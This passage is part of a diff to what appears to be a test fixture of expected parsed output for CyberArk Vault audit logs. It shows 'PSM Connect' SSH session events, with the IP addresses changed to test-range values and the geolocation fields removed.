Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331187900Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1354,39 +1212,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1403,7 +1240,7 @@ }, "@timestamp": "2021-03-15T10:35:00.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1414,16 +1251,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:35:00Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n 
\u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1435,13 +1271,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1451,9 +1287,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:35:00", "desc": "PSM Connect" 
@@ -1464,8 +1300,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936292900Z", - "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331193100Z", + "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1488,39 +1324,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1537,7 +1352,7 @@ }, "@timestamp": "2021-03-15T13:18:31.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -1548,16 +1363,15 @@ "adrian" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T13:18:31Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
